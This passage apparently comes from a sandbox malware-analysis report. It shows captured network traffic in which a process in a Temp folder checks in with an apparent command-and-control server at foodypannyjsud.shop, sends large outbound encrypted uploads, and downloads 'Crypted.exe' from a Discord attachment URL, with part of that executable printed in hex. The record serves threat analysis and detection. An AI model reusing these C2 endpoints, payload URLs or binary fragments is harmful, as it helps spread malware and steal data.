                              2024-07-06 04:16:47 UTC15331OUTData Raw: 13 c6 36 69 0c 76 eb 01 82 61 5d 88 b7 b8 89 df 35 3c 88 12 a5 87 86 d1 e7 01 1c c9 a8 4a be 76 19 18 1f 83 d2 ef 6b 12 e2 e8 2b e7 2e 5d df 22 4a 27 15 e2 26 83 e8 ff a7 42 fe ff 0f c9 b6 20 e9 b0 98 c7 56 c0 bc 13 0f 3e a0 ad 55 91 ef 75 c6 2e 8c 60 f6 80 6d 9c 56 1d 4d 66 7f 67 97 95 2f 06 48 ca dc 05 44 b2 f2 25 47 97 d8 0d f3 11 23 74 04 8f 96 e5 fe d5 5d 79 90 b2 7c e4 80 d3 dc 52 b6 c4 9f eb 35 88 e4 92 64 3e 81 e8 2d 1c 72 ac 74 8f 00 b3 fb 9e ab bd 20 be 0f c6 04 74 f7 0a 93 a5 c3 82 e4 d6 0a f6 19 97 e3 02 21 e0 6d 49 64 15 ad f4 6f 39 b7 d3 93 72 c4 ef 74 d7 0e 4a 6d 78 0c 20 86 a6 31 b8 1b f7 b8 51 dd 16 0b 00 21 fd 56 fb 3d d7 14 3c aa 60 7b d2 29 df 8d 73 76 ea 6d f4 03 8a 1f 15 62 f6 62 da 0e 39 0a a3 a1 05 35 e6 e9 c4 74 06 af b5 a0 f1 78
                              Data Ascii: 6iva]5<Jvk+.]"J'&B V>Uu.`mVMfg/HD%G#t]y|R5d>-rt t!mIdo9rtJmx 1Q!V=<`{)svmbb95tx
                              2024-07-06 04:16:47 UTC15331OUTData Raw: aa 93 71 d1 9e fc c0 b5 d9 42 86 36 90 8d 18 6b f2 13 2d ac 15 30 20 66 a9 43 10 c4 bb 22 bc ac 34 39 16 44 e9 57 9b 1d 0c 33 3e d2 da bc 6e 0e 9a 2c d5 52 42 93 d0 f8 d2 65 82 81 3e 7a d5 ef bc 6f ea cb 19 5d 29 56 d1 82 fd af c4 95 2d 83 02 c8 e3 03 dc 66 14 ec 9d ea 8a 2e 3e a2 ef bd 76 fb b6 09 1e bc 2f fc f7 74 8d dd ce d1 03 65 80 17 f0 62 56 fa 02 25 fa 7f 7b 67 e9 26 91 12 02 0d 57 b8 ab ba c5 bf d0 33 c9 6b dd e3 6c 05 aa 70 be a3 be 1c 48 4d 99 71 54 a8 3c c9 91 0a 83 91 ac 6d 5e 62 2c cd 1c df a4 19 94 fe 23 3e c1 a1 cd c0 a0 b6 b2 2d 99 5c ab d5 82 8f 70 99 ed 7e 1a 64 89 9f 9c e0 48 38 a6 a1 c3 8f ad c4 4f b8 20 28 0e 65 7e 9e 0f 44 3f a3 6d f0 cf 93 29 f4 70 7e 30 24 c1 03 bf 98 8f 8e 27 c7 bc 62 2e c4 15 7f d0 d6 c6 c2 d1 d0 c1 02 e0 ab eb
                              Data Ascii: qB6k-0 fC"49DW3>n,RBe>zo])V-f.>v/tebV%{g&W3klpHMqT<m^b,#>-\p~dH8O (e~D?m)p~0$'b.
                              2024-07-06 04:16:47 UTC15331OUTData Raw: 8f f3 e7 67 ad 2a 08 43 f3 18 ce ef 33 91 47 67 e2 ef 52 a2 29 6d c1 55 0f 66 ef ef ad 49 df 4d 8c e5 5a 33 53 6b eb 12 56 4c 21 79 07 7a f1 60 62 2e 39 16 93 6d 98 c0 12 16 ed 63 dd 7d 99 d6 cc fa d9 1b f2 88 47 7d 3c 1b 29 07 88 69 4a 97 83 48 0b 23 4d 3d 79 de eb 1e 82 69 46 48 26 e2 af 96 54 b6 8c 9f c9 29 88 ef 7e 84 75 16 b0 cc a0 cb 2b 8a df 23 f4 89 1f fd 93 dc b3 71 16 64 cd 93 85 c3 9c 94 a2 b1 30 c6 3f 89 95 78 0a dd 86 d2 b7 61 3f 3e b5 c7 5d 19 1b 62 cd 4e 17 24 5b ac 87 2a 5c 0d 8d 80 51 38 57 ff 68 74 58 14 39 e9 f6 f2 7e f0 fa 67 ab be 6e 68 d0 34 5f fd 89 b1 da 81 0c 38 9e 61 ea 50 99 2c 94 25 64 87 0d 1b c8 24 21 e2 88 f8 cd 60 e7 7c 82 11 be 0e 7f 9a ce fb 95 23 6e 3c 54 e7 93 76 ce c5 72 29 c1 92 50 c3 73 14 05 d6 1f 70 0e ad 09 ac 64
                              Data Ascii: g*C3GgR)mUfIMZ3SkVL!yz`b.9mc}G}<)iJH#M=yiFH&T)~u+#qd0?xa?>]bN$[*\Q8WhtX9~gnh4_8aP,%d$!`|#n<Tvr)Pspd
                              2024-07-06 04:16:47 UTC15331OUTData Raw: 05 bf d6 a0 15 c0 7e 49 71 e9 eb 81 f9 c4 b4 4b f1 56 9e 6a b2 fc 96 df 04 8a 9a 19 62 1a c7 6b c8 94 1a 7b a5 9d c7 81 05 de 53 36 62 24 84 c1 5c 74 ff 0b e7 18 3c a2 ca c8 4f 02 89 2d c1 e0 46 7b e8 fb 83 51 df d7 d4 87 de 82 c4 34 53 a9 ec 19 46 47 dd 99 e0 b5 ac 93 4c bb 2d b5 8b 84 8f e6 50 7a aa 6c 36 89 90 9f c0 c8 cb 31 ec 3e 72 db 91 7f 6e 1b e7 47 31 b5 f2 0c 25 bb 90 8f 1f fa 73 26 17 25 d9 1b 39 dc 2a 08 12 b7 4d bc d5 db 8d 6b 34 c7 4b 39 d3 51 18 76 24 9f 9c 85 9c 81 bf b3 98 9b 82 d9 7c 83 57 2d b9 0c cb 0f ee b2 65 e7 13 66 c9 64 57 0d c0 f8 32 18 f8 e8 08 5c 29 a8 a1 c3 0b c9 61 c1 1d 27 4e ba de 99 d2 b9 e6 8a bd ff 85 a9 a0 ea 47 ec 6d cc 8b b9 7e 85 60 9c 16 b8 50 ca da 7f 2a e7 3e 75 70 97 ce 76 d0 ae a5 06 9d 64 64 59 1a 45 20 46 5e
                              Data Ascii: ~IqKVjbk{S6b$\t<O-F{Q4SFGL-Pzl61>rnG1%s&%9*Mk4K9Qv$|W-efdW2\)a'NGm~`P*>upvddYE F^
                              2024-07-06 04:16:47 UTC15331OUTData Raw: a4 38 0e ce 09 77 45 b2 07 47 5a 86 31 39 21 93 f7 f0 3c ff 55 c5 3c d1 a5 8e 75 b8 4c bd b6 06 fc 14 eb 16 6d 6d fb 9d 95 98 60 49 46 8c 90 f9 05 7b 6c 6c 27 94 bd 63 9b 1e 3a f1 bd 6b 11 54 28 8a 04 24 ed b0 3c d4 1c fe 97 14 ff c5 f2 3c 89 48 e2 ea a5 1f 79 b3 85 3e 55 ab 06 a3 a0 bd e5 cc 4b 0f 50 fc 4f 33 e0 f4 5a 85 8a c6 76 7d be 97 db 12 ac 4a 0e 5b af cf 59 8c 7e 19 ff 9d 10 41 9e 15 4e 6f 3d b4 56 9b 6a 1e 7d c4 d5 87 75 e2 cb e0 d6 d8 ee 22 c2 5c 25 ad a3 04 30 b6 9b a9 94 92 b7 c2 cc f3 fa 6b d7 8b bb 69 33 c1 a9 ff 46 54 16 ac fc cb 07 cf c0 d4 2c 2f 4d 69 f0 a8 18 85 a6 c5 6f 95 92 2b dc 49 04 d7 d1 5c bd 8e 5f e6 b7 9a a0 9f 9e 5f cc 72 1c 3e 47 39 42 0c 9d 63 f9 66 ee 50 b8 bc e0 7c 02 89 26 3a 00 f7 5d cb a0 60 ae 54 a7 f7 fe fd 51 5e 0c
                              Data Ascii: 8wEGZ19!<U<uLmm`IF{ll'c:kT($<<Hy>UKPO3Zv}J[Y~ANo=Vj}u"\%0ki3FT,/Mio+I\__r>G9BcfP|&:]`TQ^
                              2024-07-06 04:16:47 UTC15331OUTData Raw: 95 33 1f e6 5c e3 36 9d b8 62 48 21 9b d4 84 e1 f0 ca e0 78 8d d1 c9 95 da 2e e5 e5 bb 0d 78 a0 6f a3 e6 9b 72 19 74 0b 70 e3 b1 40 fb d2 1d 88 5a 8e 64 67 2c 68 a2 b8 aa 00 8b ee 3f d3 7a 49 f7 f6 a4 77 1d 55 1b 76 e5 5f 7e bb 8b 41 15 00 9d 55 cb fe 5b 36 5e 03 ee 17 a6 a2 f1 b3 ca 62 6b 8d 95 b8 68 ba 6d 65 aa dc 5a 24 40 67 70 ff 49 db fd 29 a2 d2 d1 ba f3 cf 68 20 7a a7 7c 72 da 78 33 a5 d6 80 62 a4 c7 e6 ec 17 0b 5e 8e b9 e5 9a 73 e9 57 52 8b e7 79 a9 f9 bc 6b 29 e8 80 d8 96 b0 55 51 75 98 b1 d7 29 04 42 fd b4 8b 0c be ba 76 ff c5 c5 db 78 34 ce 88 9d 4d 46 61 ce f9 cc fb 55 2f d4 6a cd 0e e3 d7 62 94 41 ba 2b 79 56 94 c0 02 cb 78 34 3f 40 3e 02 f6 ee 9c 91 d8 80 69 56 2e 65 ee 8b e3 d6 bb 86 f8 b5 ee b5 63 1f 15 bb 7c ef 69 19 99 02 3b d3 4f 87 c4
                              Data Ascii: 3\6bH!x.xortp@Zdg,h?zIwUv_~AU[6^bkhmeZ$@gpI)h z|rx3b^sWRyk)UQu)Bvx4MFaU/jbA+yVx4?@>iV.ec|i;O
                              2024-07-06 04:16:50 UTC802INHTTP/1.1 200 OK
                              Date: Sat, 06 Jul 2024 04:16:50 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: PHPSESSID=ogegtoqh5fhbshkvsirph12sva; expires=Tue, 29-Oct-2024 22:03:28 GMT; Max-Age=9999999; path=/
                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              Pragma: no-cache
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hWwe1H5dWJDHJ8pAX1CBSgG9yk3jiDMwVZF%2BWMpl6OEdABdz5O8ZRTpzhMt9O2gvJjSLY9Yq1Tclxe%2FfLVf5J%2BkSD1z7CirQK2VK0R0eP8eHS29R0cQEspbDT4J%2BtI6ZUn6Okftv"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 89ecc80b7e4872aa-EWR
                              alt-svc: h3=":443"; ma=86400


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.2.449758188.114.97.34434628C:\Users\user\AppData\Local\Temp\8FDD.exe
                              TimestampBytes transferredDirectionData
                              2024-07-06 04:16:50 UTC267OUTPOST /api HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                              Content-Length: 77
                              Host: foodypannyjsud.shop
                              2024-07-06 04:16:50 UTC77OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 62 4f 4b 48 4e 4d 2d 2d 26 6a 3d 26 68 77 69 64 3d 42 44 41 32 39 37 42 32 35 34 45 41 39 44 30 44 36 38 36 39 35 36 39 34 31 31 30 44 42 46 46 37
                              Data Ascii: act=get_message&ver=4.0&lid=bOKHNM--&j=&hwid=BDA297B254EA9D0D68695694110DBFF7
                              2024-07-06 04:16:51 UTC798INHTTP/1.1 200 OK
                              Date: Sat, 06 Jul 2024 04:16:51 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: PHPSESSID=rd8fjau8t7io046ubbgai6joo5; expires=Tue, 29-Oct-2024 22:03:30 GMT; Max-Age=9999999; path=/
                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              Pragma: no-cache
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kLG3Y6oJr3WQmsBDCbtK9jbbu0X0H%2BOVhasyy0DihBb6FoscitmhODD7XC3VIa9WF6RyIibqRrZOTqPBtl6TqtzjHqnsErYZxirkmFchAl73kiHRruzowFDjjM2%2BTFvd7XOF2qo1"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 89ecc81d2f3b6a53-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-07-06 04:16:51 UTC54INData Raw: 33 30 0d 0a 59 5a 2b 2f 6d 32 71 39 73 66 70 38 6c 43 2b 36 34 79 39 43 75 6a 4a 33 64 59 4b 4e 6a 71 33 68 77 46 52 73 50 43 49 77 4b 74 41 36 77 67 3d 3d 0d 0a
                              Data Ascii: 30YZ+/m2q9sfp8lC+64y9CujJ3dYKNjq3hwFRsPCIwKtA6wg==
                              2024-07-06 04:16:51 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.2.449763162.159.133.2334432580C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              2024-07-06 04:17:09 UTC312OUTGET /attachments/1253399732433195008/1258946128448327812/Crypted.exe?ex=6689e473&is=668892f3&hm=8a4a5d7faf9a541161a67629af15ee492b44a297fba72b8c381671e290b63b29& HTTP/1.1
                              Connection: Keep-Alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: cdn.discordapp.com
                              2024-07-06 04:17:09 UTC1208INHTTP/1.1 200 OK
                              Date: Sat, 06 Jul 2024 04:17:09 GMT
                              Content-Type: application/x-msdos-program
                              Content-Length: 1073152
                              Connection: close
                              CF-Ray: 89ecc892ef3c4273-EWR
                              CF-Cache-Status: HIT
                              Accept-Ranges: bytes, bytes
                              Age: 12561
                              Cache-Control: public, max-age=31536000
                              Content-Disposition: attachment; filename="Crypted.exe"
                              ETag: "f7f6eb480fe715733e509d0489171c18"
                              Expires: Sun, 06 Jul 2025 04:17:09 GMT
                              Last-Modified: Sat, 06 Jul 2024 00:42:27 GMT
                              Vary: Accept-Encoding
                              alt-svc: h3=":443"; ma=86400
                              x-goog-generation: 1720226547171116
                              x-goog-hash: crc32c=ZvBEVA==
                              x-goog-hash: md5=9/brSA/nFXM+UJ0EiRccGA==
                              x-goog-metageneration: 1
                              x-goog-storage-class: STANDARD
                              x-goog-stored-content-encoding: identity
                              x-goog-stored-content-length: 1073152
                              x-guploader-uploadid: ACJd0NpCfmmfjql3aO1H9EnBr3wxU_Bgw0MO3uYEBGQzM7QVHEo7LlxBxwxYqfdVdtkM8od5Seo
                              X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                              Set-Cookie: __cf_bm=dqjYsEmR3LSNTf0FRV6gAnGAhoonhhHcLeNYqaQiAqM-1720239429-1.0.1.1-lDRbmeadB8M2ThayjGveGiUplxd6_U7z9DqJn0T4b8jskF3z5UOfMwX_Sh5Cqcemk1402z2UuBJL7nDmnDrq7w; path=/; expires=Sat, 06-Jul-24 04:47:09 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                              2024-07-06 04:17:09 UTC523INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 57 49 41 61 44 63 6f 77 56 74 59 50 45 6d 6c 58 25 32 46 61 42 43 52 72 25 32 42 6e 4c 4d 32 4a 6a 63 32 25 32 42 48 54 34 6f 37 64 52 36 57 56 65 53 4f 5a 6d 41 42 55 30 36 4b 66 66 56 59 52 75 6c 74 69 34 73 67 6f 51 30 4e 44 6b 43 4a 6d 62 49 66 5a 57 34 68 61 41 5a 72 25 32 42 4f 4e 63 78 41 25 32 46 65 75 71 67 5a 7a 4c 47 71 64 47 49 79 6f 50 77 25 32 46 38 25 32 46 65 6b 52 58 32 42 57 32 71 67 46 52 33 74 65 47 6a 7a 79 58 72 49 41 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d
                              Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WIAaDcowVtYPEmlX%2FaBCRr%2BnLM2Jjc2%2BHT4o7dR6WVeSOZmABU06KffVYRulti4sgoQ0NDkCJmbIfZW4haAZr%2BONcxA%2FeuqgZzLGqdGIyoPw%2F8%2FekRX2BW2qgFR3teGjzyXrIA%3D%3D"}],"group":"cf-nel","m
                              2024-07-06 04:17:09 UTC1007INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 44 67 26 ff 00 06 48 ac 00 06 48 ac 00 06 48 ac 15 79 4d ad 2e 06 48 ac 15 79 4c ad 0c 06 48 ac 15 79 4b ad 09 06 48 ac 09 7e db ac 0e 06 48 ac 4b 7e 49 ad 09 06 48 ac 00 06 49 ac cf 06 48 ac 38 86 4b ad 0a 06 48 ac 38 86 4c ad 01 06 48 ac 00 06 48 ac 01 06 48 ac 38 86 4d ad 3e 06 48 ac 39 86 48 ad 01 06 48 ac 39 86 4a ad 01 06 48 ac 52 69 63 68 00 06 48 ac 00 00 00 00 00 00 00
                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Dg&HHHyM.HyLHyKH~HK~IHIH8KH8LHHH8M>H9HH9JHRichH
                              2024-07-06 04:17:09 UTC1369INData Raw: 5a 80 92 2d 00 55 4c 10 00 00 72 25 00 49 2d 00 ab ff 5f d9 fe 48 8d 05 29 d5 17 00 0c 0d 1a 83 39 00 75 01 c3 48 8b d0 e9 2d 0d ad 72 80 8c bc 9c 38 1c 0d 17 c8 c8 01 32 08 32 23 1c 20 23 07 55 46 58 32 72 80 8c 49 7b 6c 07 c8 c8 01 ee df e1 8c 1c 20 23 d2 dc cd 01 32 72 80 e7 d8 91 01 e4 e5 1a d6 0b d6 15 40 46 0e 90 06 40 31 e4 00 19 39 53 44 5e 90 91 03 64 4f 59 4a 39 40 46 0e 74 65 67 64 e4 00 19 58 5a 4b 0e 90 91 03 a5 96 98 6b 3e 40 46 89 23 c4 2a 8b 3f 72 20 43 b2 91 d2 7c 79 63 17 c9 01 1b 03 7f 4d 24 0f 90 61 eb c3 d3 0e 39 40 8e 3f 69 c3 51 40 0e 39 40 bb 39 39 40 0e 39 b3 21 9b 0f 39 40 0e 09 83 f1 d1 20 87 0c 20 7b d9 1c 20 87 1c 63 c9 4b 87 1c 20 87 b1 33 99 1c 81 1c 20 2b 21 20 87 1c 30 ff 13 29 1e 20 87 1c 03 11 fb c2 24 0f 90 41 19 e3 c2
                              Data Ascii: Z-ULr%I-_H)9uH-r822# #UFX2rI{l #2r@F@19SD^dOYJ9@FtegdXZKk>@F#*?r C|ycM$a9@?iQ@9@99@9!9@ { cK 3 +! 0) $A
                              2024-07-06 04:17:09 UTC628INData Raw: f8 44 aa a0 ae e6 c1 73 f2 4c 4f 41 ad 4d de 83 db 6f 28 c0 49 03 02 0f 82 f2 18 fc 49 b0 0f 87 13 9e c1 83 0b b8 49 2b c0 be 89 50 c5 b7 ba fd 70 0b a6 40 00 be 7c 7f 77 52 6c c2 0f b7 ea b6 0d 6f 1a f7 e2 8b 51 2a 03 c2 cc c0 07 d5 49 76 2f 92 67 68 da 32 72 28 d3 77 22 30 bc 87 c1 cb 75 d1 9c 10 1c 0c 68 7f 24 48 54 8e d6 8e 6a 85 cc 01 be 11 47 7b 87 de ac 1d 96 4b 2b d6 fb 00 74 14 18 d1 aa 8e 77 bd 60 ea 0c 92 d3 41 80 3a 4a 04 41 c6 02 98 6c ff 79 ff 3b 15 5d b9 2a 00 72 33 10 5c 73 2a 48 c1 e9 0b 6c 15 47 36 3c fb ff 42 80 3c 11 ff 74 18 42 c6 04 0c 2c 0a 56 0d 40 ad e0 7e fb 2c 80 39 28 03 c6 01 ff c3 66 00 df e0 f3 b6 db de 8a 0d f6 4a 42 72 66 10 f5 73 5d e4 c9 a1 e4 02 14 db b8 da b8 21 79 80 bc c5 4a be 4a f0 4d 15 61 ff 7e c0 e4 0f b1 11 75
                              Data Ascii: DsLOAMo(III+Pp@|wRloQ*Iv/gh2r(w"0uh$HTjG{K+tw`A:JAly;]*r3\s*HlG6<B<tB,V@~,9(fJBrfs]!yJJMa~u
                              2024-07-06 04:17:09 UTC1369INData Raw: 74 cb cb 07 09 fe 66 f8 70 10 40 84 ed 74 08 6f 3c 43 c1 d3 14 2c 34 17 53 1f 2b 0a 9e c1 da 45 4f bb 4e 40 98 e2 15 56 5d c3 1f 57 87 f9 f5 b6 fb 4d 3c 84 98 27 00 b9 38 8a 5c 05 fc 52 d8 43 0e c7 bf 29 00 1e e6 0a 21 18 df 44 d8 da 33 24 57 04 11 01 00 0a 41 10 8d 50 07 b8 50 d0 6d 8c 41 20 c1 6c ca 66 9c b1 0b 57 00 0e 5f 0c ca 04 24 dd 2d 32 58 0f d7 38 05 48 2d 8b 48 58 b6 0a ff f2 27 58 0c d0 46 2b 0c c1 e0 30 2a 1c 11 3e fb bf b8 4f 03 c8 44 89 0d bd 23 54 a6 b4 ac bc fc 18 0e 5a 14 94 7b 88 c3 c5 5f c3 33 db 0c 76 16 17 34 db 74 16 19 f3 4c ba 6b ef f1 0a 1e 57 70 28 4f 90 53 21 fa 18 1c 5f 96 23 67 b1 a2 d5 1e f8 77 67 e4 92 cd f3 9e 55 40 90 a7 bd d9 0e 93 67 2c cd 47 20 94 1f e1 a0 69 c8 b0 8c 64 0a 8a 00 6e b7 68 d1 cb 60 b3 38 ad 30 74 12 71
                              Data Ascii: tfp@to<C,4S+EON@V]WM<'8\RC)!D3$WAPPmA lfW_$-2X8H-HX'XF+0*>OD#TZ{_3v4tLkWp(OS!_#gwgU@g,G idnh`80tq
                              2024-07-06 04:17:09 UTC1369INData Raw: 10 4a 28 01 11 84 29 18 c3 9e b0 0f 2e c0 c8 03 11 ee de 08 54 c0 15 3b 88 88 9e 80 eb 7f da 94 1c d0 f0 83 60 38 ef 49 8b da a7 79 9a e7 0e 0c 20 28 28 30 a1 ab 78 9a 30 38 58 e8 20 0c 09 f0 1c 4e 70 37 70 37 fe f9 0e 0a b0 36 66 41 02 b0 57 10 b8 a0 79 f2 64 53 45 80 b0 88 c0 90 d0 75 4d 9e 3c 98 e0 a0 f0 40 01 b3 19 9c 9c 11 b0 10 b8 c1 f8 48 78 17 b9 e0 41 94 d9 ff d7 8b 2d b7 a3 0b 38 b1 26 48 9b 32 4a 68 49 86 c9 49 d1 89 09 9a 42 42 29 be 41 ef 56 b4 78 45 33 c9 5a 49 3b c9 74 05 e5 0f 36 dc 08 c8 7c f3 1a 8a 80 02 f7 05 6b 18 2b 0f 68 0f 37 8a 1c 80 bc 21 12 12 7b 7c 0e 28 78 7e d0 0c e0 85 0e ff e0 5c 10 72 51 bf c8 10 58 24 5f 9c 18 9f 33 9c 59 9c 45 bb 81 30 42 81 0c 81 c5 59 9c c5 0c 81 0c 81 0c 81 9c c5 59 9c 0c 81 0c 81 0c 8e b6 54 5c 81 7e
                              Data Ascii: J().T;`8Iy ((0x08X Np7p76fAWydSEuM<@HxA-8&H2JhIIBB)AVxE3ZI;t6|k+h7!{|(x~\rQX$_3YE0BYYT\~
                              2024-07-06 04:17:09 UTC1369INData Raw: 40 b7 df 21 60 82 48 22 e0 d1 0f 4c 3a 04 a1 df 4c 7c df f6 ca 4a 1d d1 f8 96 31 48 ff 60 40 37 c0 b9 88 b0 1f 19 42 65 07 1e 26 fc ce bc c3 20 1a 6a 22 9d c7 8c 0d f7 bc 47 41 b8 c9 16 c4 33 49 d8 c1 e2 80 7d cb 58 bf f9 e4 16 fb 58 f1 48 0a ff 50 10 e9 87 a5 fc 26 d8 4f 49 ff 61 18 cc 7f 48 81 c9 30 87 0c 21 83 4c 28 c6 a5 f0 40 f0 41 38 01 c3 df 2b 51 20 3e 47 c0 58 f8 3b d0 73 13 18 9e 0a 4d 71 60 7a 9a 41 1c 6e 70 30 59 0d 85 3b b5 5f 72 03 38 6c 42 36 00 83 43 fe 89 2c 86 fd 3f 5c 5e 26 4c 2b 41 20 4c 3b c0 73 2a cd 21 9b 01 ae 0e 69 f4 d0 f1 fa ff c2 16 c2 02 e0 f6 00 01 d2 63 02 9f 70 8b c9 4e 6c c0 7b bf 92 5e c0 20 7d df 10 04 1e 49 73 14 80 48 37 56 ef fd 8c 67 11 c8 33 f6 86 89 70 10 06 18 0e 30 3d e0 c5 f3 40 88 70 38 40 ca 1e 2c c6 45 99 a6
                              Data Ascii: @!`H"L:L|J1H`@7Be& j"GA3I}XXHP&OIaH0!L(@A8+Q >GX;sMq`zAnp0Y;_r8lB6C,?\^&L+A L;s*!icpNl{^ }IsH7Vg3p0=@p8@,E
                              2024-07-06 04:17:09 UTC1369INData Raw: 88 15 7a f7 74 14 78 53 3c 2b f2 c9 25 d0 5f f0 4b 84 50 6a a0 9f 11 4a ca 48 2c f6 01 7f 82 a0 3d 1c 3c 8e 54 9f dc 61 16 8b 3f 36 5a 29 d3 e1 d8 bf db f2 1c 1f f4 34 3c cf 53 47 db 54 a3 9f 83 06 45 85 db 44 f7 41 45 1f 64 f0 16 f7 8d cf fb c7 b6 48 08 3d ff d8 66 ac 15 64 09 25 1c 3f 48 b2 1a 0b 26 cc 86 c2 95 14 3c 1f 48 1a d0 b7 c2 20 0f 94 68 05 d0 d8 54 a3 53 4f 57 21 ff 58 81 2a 47 30 86 2b af e1 4c 77 0d d9 bd 30 f9 8b fa 12 2c f6 cd 95 87 3c 0d 12 45 45 3b 24 4d a1 f0 87 56 21 d6 12 85 ff 88 44 a4 f0 09 b8 c3 11 2d 41 ff 92 29 cd 07 ba c0 46 21 f0 29 40 22 50 e6 60 d2 3c 58 30 f2 28 81 3f 72 c9 d2 85 b9 0c d0 80 3d 11 22 12 3e f1 6d 81 0d 0e 0e 74 0e 66 9c fb a3 1c e7 e9 be 3c db 5f 39 0d ed 21 41 a0 42 36 79 1f 4c 53 1e b2 52 f8 a7 40 38 0f b6
                              Data Ascii: ztxS<+%_KPjJH,=<Ta?6Z)4<SGTEDAEdH=fd%?H&<H hTSOW!X*G0+Lw0,<EE;$MV!D-A)F!)@"P`<X0(?r=">mtf<_9!AB6yLSR@8
                              2024-07-06 04:17:09 UTC1369INData Raw: d8 45 e3 c4 37 61 d6 da 3b 8f d3 92 10 e3 0d a5 7d 02 c3 8b bb be f6 7f 03 ea 8b 45 38 85 c0 49 0f 44 ef 50 ed 7f ad 81 5d dd e3 b3 e8 1b 4c 39 7d 40 10 12 33 98 bc 6a c5 ea 96 b6 f8 41 98 02 54 98 e8 01 85 51 37 ab f8 be 2f f8 4b 9d 8b 4d ba e9 04 f6 c1 01 81 9d 49 cf cc a9 df 12 1f 44 38 7f 38 75 14 8a 71 60 6b 71 f6 41 ff 10 67 4a af d7 3e 24 4d 70 b7 48 69 1a c3 13 45 b6 7d 68 06 48 72 54 9d 70 72 c7 4a 06 bc 70 f5 e6 89 b5 a5 70 ae 02 8e 57 69 1c bd e9 cf 52 9a 00 43 c1 e2 72 39 ac bc ae 3b 29 4a 65 fd 08 c8 69 c2 57 7b 3a d3 60 59 b1 0c 48 59 16 bb 35 dc 5d c0 3d 05 18 06 0c 77 d3 4f 20 f8 6c 36 c0 b4 cc f0 81 a0 31 aa de a7 9d 59 e0 ef 38 aa 05 76 52 07 5e e8 96 8d b8 dd 65 e0 09 73 07 44 53 19 7a 7d 1c f0 c4 c6 f4 ac d5 4b 0c 6e ab 49 f7 19 13 6c
                              Data Ascii: E7a;}E8IDP]L9}@3jATQ7/KMID88uq`kqAgJ>$MpHiE}hHrTprJppWiRCr9;)JeiW{:`YHY5]=wO l61Y8vR^esDSz}KnIl
                              2024-07-06 04:17:09 UTC1369INData Raw: c9 0f 9a 24 75 a3 58 58 20 70 5d 9c ec 42 9f f5 c3 9b 1c 06 10 ff c8 41 64 01 40 64 2e 8c 81 3d 83 4b b8 20 0e 08 66 c8 9f a9 3c 95 f7 62 eb 34 10 9e 2b 9d 22 79 2a 4f e5 9c 19 9b 10 9a 43 b8 95 55 07 5e cf 78 0a 00 15 60 b6 84 a2 4d de f0 0e 3e 62 92 38 44 30 00 cf c2 63 f3 3c cf 6b cb 06 d4 dd e6 ef 00 25 80 e1 f8 63 cf 09 ac 56 d8 5e 8b ec dc b0 05 26 a1 cb fe d6 d2 c2 1c 55 b0 d5 df db c8 66 06 d0 88 55 d2 14 d4 49 81 f8 97 73 1a dc e3 7f 23 e2 03 75 14 44 89 45 d8 c7 45 c0 43 c6 45 d2 aa 3d 7a 68 ba 55 9f ca 83 e1 36 67 ed 7b de ed 70 08 14 c1 e9 02 84 e8 f0 0e f4 a8 30 29 b6 7d fb 64 40 02 45 e8 1a e0 0f 10 45 e0 32 4d f0 76 8d 6f 83 d9 f2 01 16 0e aa 11 02 06 4a 10 34 67 d4 be e5 b2 e0 03 4b 48 f4 e0 46 60 81 06 49 39 11 f0 56 41 14 d2 66 fa c0 26
